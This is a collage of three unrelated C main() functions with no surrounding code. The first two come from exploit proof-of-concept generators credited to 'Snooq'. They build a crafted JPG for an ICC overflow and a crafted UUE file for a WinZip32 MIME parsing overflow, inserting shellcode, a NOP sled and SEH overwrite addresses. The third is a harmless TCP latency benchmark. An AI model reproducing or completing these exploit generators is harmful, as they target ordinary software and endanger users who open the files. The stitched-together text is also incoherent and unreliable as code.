int main(int argc, char *argv[])
{
int i=0, t=TARGET;
if (argc==2) { t=atoi(argv[1]); }
get_bytes(targets[t-1].jmpADD);
printf("\nICC Overflow PoC, By Snooq [[email protected]]\n\n");
printf("-> Generating 'jpg' file for target #%d...\n",t);
filladdr();
fillshellcode();
buildfile();
return 0;
}
int main(int argc, char *argv[])
{
int i=0, t=TARGET;
if (argc==2) { t=atoi(argv[1]); }
where=targets[t-1].topSEH;
what=targets[t-1].jmpADD;
printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [[email protected]]\n\n");
memset(buff,NOP,BSIZE);
printf("-> Generating 'uue' file for target #%d...\n",t);
memcpy(buff,header,HSIZE);
filladdr();
memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
buildfile();
return 0;
}
int
main(int argc, char *argv[])
{
struct sockaddr_in addr;
int so;
parse_args(argc, argv);
if (args_addr == NULL) {
ERROR_DIE("-addr is missing\n");
}
if (args_port <= 0) {
ERROR_DIE("-port is missing\n");
}
if (args_m <= 0) {
ERROR_DIE("-m must be > 0\n");
}
if (args_m > 8*1024) {
ERROR_DIE("-m must be <= 8192\n");
}
if (args_sleep < 0) {
ERROR_DIE("-sleep must be >= 0\n");
}
memset(&addr, 0, sizeof(addr));
if (0 != filladdr(args_addr, &addr)) {
ERROR_DIE("filladdr\n");
}
addr.sin_port = htons(args_port);
#if CHECK_RTO_RETRANS
pthread_mutex_init(&checker_lock, NULL);
checker_so_num = 0;
memset(checker_so, -1, sizeof(checker_so));
{
pthread_attr_t attr;
pthread_t tid;
pthread_attr_init(&attr);
pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM);
pthread_create(&tid, &attr, check_thread, NULL);
if (args_s)
pthread_create(&tid, &attr, stat_thread, NULL);
}
#endif
if (args_s) {
int one = 1;
int new_conn;
int id = 0;
struct rr *r;
so = socket(AF_INET, SOCK_STREAM, 0);
if (so < 0) {
PERROR_DIE("socket");
}
if (0 != setsockopt(so, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one))) {
PERROR_DIE("setsockopt(SO_REUSEADDR)");
}
if (0 != bind(so, (const struct sockaddr*)&addr, sizeof(addr))) {
PERROR_DIE("bind");
}
if (0 != listen(so, args_backlog)) {
PERROR_DIE("listen");
}
while ((new_conn = accept(so, NULL, NULL)) > 0) {
log_msg("server accepted a conn. so=%d id=%d\n", new_conn, id);
r = malloc(sizeof(*r));
memset(r, 0, sizeof(*r));
r->id = id++;
r->so = new_conn;
r->server = 1;
pthread_attr_init(&r->attr);
pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
pthread_create(&r->tid, &r->attr, rr_thread, r); // thread frees r
// We want to use threads, not events, for this test
}
}
else {
struct rr *ra, *r;
int i;
struct hist prev_hist, cur_hist;
uint32_t prev_count, cur_count;
ra = malloc(sizeof(*ra) * args_t);
memset(ra, 0, sizeof(*ra) * args_t);
for (i = 0; i < args_t; i++) {
so = socket(AF_INET, SOCK_STREAM, 0);
if (so < 0) {
PERROR_DIE("socket");
}
if (0 != connect(so, (struct sockaddr*)&addr, sizeof(addr))) {
PERROR_DIE("connect");
}
log_msg("connected to server. so=%d id=%d\n", so, i);
r = &ra[i];
r->id = i;
r->so = so;
r->msg_len = args_m;
r->sleep = args_sleep;
pthread_attr_init(&r->attr);
pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
pthread_create(&r->tid, &r->attr, rr_thread, r);
}
// Print stats forever
memset(&prev_hist, 0, sizeof(prev_hist));
prev_count = 0;
while (1) {
sleep(1);
// Gather stats from threads
memset(&cur_hist, 0, sizeof(cur_hist));
cur_count = 0;
for (i = 0; i < args_t; i++) {
int j;
r = &ra[i];
cur_count += r->stat_count;
for (j = 0; j < HIST_BIN_COUNT; j++)
cur_hist.bin[j] += r->hist.bin[j];
}
printf("%u request-responses/s\n", cur_count - prev_count);
for (i = 0; i < HIST_BIN_COUNT; i++) {
/* if (cur_hist.bin[i] == 0) continue; */
printf("%d: %u[%u]\n", ((i+1) * HIST_BIN_WIDTH),
cur_hist.bin[i], cur_hist.bin[i] - prev_hist.bin[i]);
}
prev_count = cur_count; // struct copy
prev_hist = cur_hist;
#if CHECK_RTO_RETRANS
print_checker();
#endif
}
}
return 0;
}
